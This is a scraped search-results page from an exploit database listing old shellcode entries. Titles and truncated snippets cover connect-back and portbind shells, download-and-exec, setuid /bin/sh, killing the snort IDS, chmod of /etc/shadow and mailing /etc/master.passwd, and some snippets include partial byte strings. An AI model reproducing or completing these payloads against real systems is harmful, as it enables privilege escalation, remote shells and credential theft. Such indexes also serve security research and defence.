Lucene search
K

7257 matches found

Exploit DB
Exploit DB
added 2004/09/26 12:0 a.m.26 views

linux/SPARC - connect back 216 bytes

linux/SPARC connect back 216 bytes. Shellcode exploit for linuxsparc platform / linux sparc connect back shellcode, because someone had to evade those firewalls. sigh / / OS : Linux Architecture : Sparc Type : Connect Back Lenght : 216 Bytes Listen-Port : 2313/TCP Default IP : 192.168.100.1 see h...

0.3AI score
Exploits0
0day.today
0day.today
added 2004/09/26 12:0 a.m.11 views

linux/x86 execve /bin/sh alphanumeric 392 bytes

Exploit for linux/x86 platform in category shellcode =============================================== linux/x86 execve /bin/sh alphanumeric 392 bytes =============================================== / Linux/x86 execve of /bin/sh you can put 0-200 nops before shellcode nop = 0x47 = 'G' / char shellc...

7AI score
Exploits0
0day.today
0day.today
added 2004/09/26 12:0 a.m.9 views

os-x/PPC execve /usr/X11R6/bin/xterm 141 bytes

Exploit for os-x/ppc platform in category shellcode ============================================== os-x/PPC execve /usr/X11R6/bin/xterm 141 bytes ============================================== / PPC OSX/Darwin Shellcode by B-r00t. 2003. Does execve/usr/X11R6/bin/xterm -display 192.168.0.10:0 exit...

7AI score
Exploits0
0day.today
0day.today
added 2004/09/26 12:0 a.m.15 views

linux/x86 shared memory exec 50 bytes

Exploit for linux/x86 platform in category shellcode ===================================== linux/x86 shared memory exec 50 bytes ===================================== / email protected - http://www.nopninjas.com Platform: Linux x86 Length: 50 bytes - This shellcode connects to the shared memory...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2004/09/26 12:0 a.m.34 views

linux/x86 kill snort 151 bytes

linux/x86 kill snort 151 bytes. Shellcode exploit for linx86 platform / x86 linux "snort IDS" shutter shellcode size 151 By nob0dy // find your own reality / / char snortshuttershellcode = "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff" "\xff\x83\xc6\x0d\x31\xc9\xb1\x80\x80"...

7.4AI score
Exploits0
0day.today
0day.today
added 2004/09/26 12:0 a.m.21 views

win32/xp download and exec source

Exploit for win32 platform in category shellcode =================================== windows/XP download and exec source =================================== ; Nice theorhetically generic url download and execute ; shellcode for Windows XP. ; ; Heck, atleast it saves you using tftp! ; ;...

7AI score
Exploits0
0day.today
0day.today
added 2004/09/26 12:0 a.m.17 views

solaris/SPARC portbind port 6789 228 bytes

Exploit for solaris/sparc platform in category shellcode ========================================== solaris/SPARC portbind port 6789 228 bytes ========================================== / Solaris shellcode - connects /bin/sh to a port Claes M. Nyberg 20020624 , / include / void mainvoid asm" !...

7AI score
Exploits0
0day.today
0day.today
added 2004/09/26 12:0 a.m.13 views

HPUX execve /bin/sh 58 bytes

Exploit for hpux platform in category shellcode ============================ HPUX execve /bin/sh 58 bytes ============================ / Hp-Ux execve of /bin/sh by K2 / uchar shellcode = "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"...

7AI score
Exploits0
seebug.org
seebug.org
added 2004/09/26 12:0 a.m.16 views

linux/x86 chmod 666 /etc/shadow 82 bytes

No description provided by source. / [email protected] Usando execve y un array de punteros include stdio.h main char name4; name0="/bin/chmod"; name1="666"; name2="/etc/shadow"; name3=NULL; execvename0,name,NULL; / include stdio.h char shellcode= "\xeb\x31" // jmp 0x31 // 3-4 "\x5e" //...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2004/09/26 12:0 a.m.9 views

os-x/PPC reboot 28 bytes

No description provided by source. / PPC OSX/Darwin Shellcode by B-r00t. 2003. Does sync reboot; See ASM below. 28 Bytes. / char shellcode = "\x7c\x63\x1a\x79" "\x39\x40\x01\x70" "\x38\x0a\xfe\xb4" "\x44\xff\xff\x02" "\x60\x60\x60\x60" "\x38\x0a\xfe\xc7" "\x44\xff\xff\x02"; int main void asm"b...

7.1AI score
Exploits0
0day.today
0day.today
added 2004/09/26 12:0 a.m.12 views

os-x/PPC create /tmp/suid 122 bytes

Exploit for os-x/ppc platform in category shellcode =================================== os-x/PPC create /tmp/suid 122 bytes =================================== / PPC OSX/Darwin Shellcode by B-r00t. 2003. Does open; write; close; exit; See ASM below. 122 Bytes. / char shellcode =...

7AI score
Exploits0
seebug.org
seebug.org
added 2004/09/26 12:0 a.m.16 views

linux/x86 kill snort 151 bytes

No description provided by source. / x86 linux "snort IDS" shutter shellcode size 151 By nob0dy // find your own reality / / char snortshuttershellcode = "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff" "\xff\x83\xc6\x0d\x31\xc9\xb1\x80\x80" "\x36\x01\x46\xe2\xfa\xea\x18\x2e\x74"...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2004/09/26 12:0 a.m.24 views

bsd/x86 - execve /bin/sh setuid 0 29 bytes

bsd/x86 execve /bin/sh setuid 0 29 bytes. Shellcode exploit for bsdx86 platform / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 29 bytes. -setuid0; -execve/bin/sh; / char shellcode= "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\xb0\x17" // mov $0x17,%al "\x50" // push %eax...

7.4AI score
Exploits0
0day.today
0day.today
added 2004/09/26 12:0 a.m.16 views

linux/x86 cp /bin/sh /tmp/katy ; chmod 4555 katy 126 bytes

Exploit for linux/x86 platform in category shellcode ========================================================== linux/x86 cp /bin/sh /tmp/katy ; chmod 4555 katy 126 bytes ========================================================== / Linux/x86 /bin/cp /bin/sh /tmp/katy ; chmod 4555 /tmp/sh using fo...

7AI score
Exploits0
seebug.org
seebug.org
added 2004/09/26 12:0 a.m.13 views

openbsd/x86 portbind port 6969 148 bytes

No description provided by source. / shell on port 6969/tcp shellcode for OpenBSD by noir / include stdio.h long shellcode= 0x4151c931,0x51514151,0x61b0c031,0x078980cd, 0x4f88c931,0x0547c604,0x084f8902,0x0647c766, 0x106a391b,0x5004478d,0x5050078b,0x68b0c031,...

7.1AI score
Exploits0
0day.today
0day.today
added 2004/09/26 12:0 a.m.14 views

linux/x86 symlink . /bin/sh 32 bytes

Exploit for linux/x86 platform in category shellcode ==================================== linux/x86 symlink . /bin/sh 32 bytes ==================================== /The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. short version size = 32 bytes OS = BSD written...

7AI score
Exploits0
0day.today
0day.today
added 2004/09/26 12:0 a.m.12 views

os-x/PPC setuid(0) + execve /bin/sh 88 bytes

Exploit for os-x/ppc platform in category shellcode ============================================ os-x/PPC setuid0 + execve /bin/sh 88 bytes ============================================ / PPC OSX/Darwin Shellcode by B-r00t. 2003. Does setuid0; execve/bin/sh; exit0; See ASM below. 88 Bytes. / char...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2004/09/26 12:0 a.m.23 views

bsd/x86 - cat /etc/master.passwd | mail email 92 bytes

bsd/x86 cat /etc/master.passwd | mail email 92 bytes. Shellcode exploit for bsdx86 platform / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 92 bytes. execve/bin/sh -c "/bin/cat /etc/master.passwd|mail root@localhost"; pueden reemplzar el comando por lo que se les ocurra. / char...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2004/09/26 12:0 a.m.28 views

linux/x86 shared memory exec 50 bytes

linux/x86 shared memory exec 50 bytes. Shellcode exploit for linx86 platform / [email protected] - http://www.nopninjas.com Platform: Linux x86 Length: 50 bytes - This shellcode connects to the shared memory segment matching the key and executes the code at that address. xorl %edi,%edi xorl...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2004/09/26 12:0 a.m.41 views

os-x/PPC setuid0 + execve /bin/sh 88 bytes

os-x/PPC setuid0 + execve /bin/sh 88 bytes. Shellcode exploit for osxppc platform / PPC OSX/Darwin Shellcode by B-r00t. 2003. Does setuid0; execve/bin/sh; exit0; See ASM below. 88 Bytes. / char shellcode = "\x7c\x63\x1a\x79\x40\x82\xff\xfd" "\x7d\x68\x02\xa6\x3b\xeb\x01\x70"...

0.2AI score
Exploits0
Rows per page
Query Builder